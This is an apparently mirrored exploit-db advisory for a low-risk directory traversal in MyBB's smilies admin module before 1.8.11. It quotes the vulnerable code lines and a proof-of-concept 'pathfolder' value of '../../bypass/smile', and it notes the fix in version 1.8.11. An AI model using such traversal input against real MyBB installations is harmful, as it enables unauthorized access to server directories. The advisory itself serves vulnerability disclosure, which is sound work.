MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal

  • 作者: Zhiyang Zeng
    日期: 2017-04-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41862/
  • Description:
    ============
    
    product: MyBB
    Homepage: https://mybb.com/
    vulnerableversion: < 1.8.11
    Severity: Low risk
    
    ===============
    
    Proof of Concept:
    =============
    
    vulnerability address:http://127.0.0.1/mybb_1810/Upload/admin/index.php?module=config-smilies&action=add_multiple
    
    vulnerabilityfile directory:/webroot/mybb_1810/Upload/admin/modules/config/smilies.php
    
    vulnerabilityCode:
    
    Line 326 $path = $mybb->input['pathfolder'];
    
    Line 327 $dir = @opendir(MYBB_ROOT.$path);
    
    if we input "pathfolder" to "../../bypass/smile",Directory Traversal success!
    
    ============
    
    Fixed:
    ============
    
    This vulnerability was fixed in version 1.8.11
    
    
    MyBB 1.8.11 & Merge System 1.8.11 Release
    =============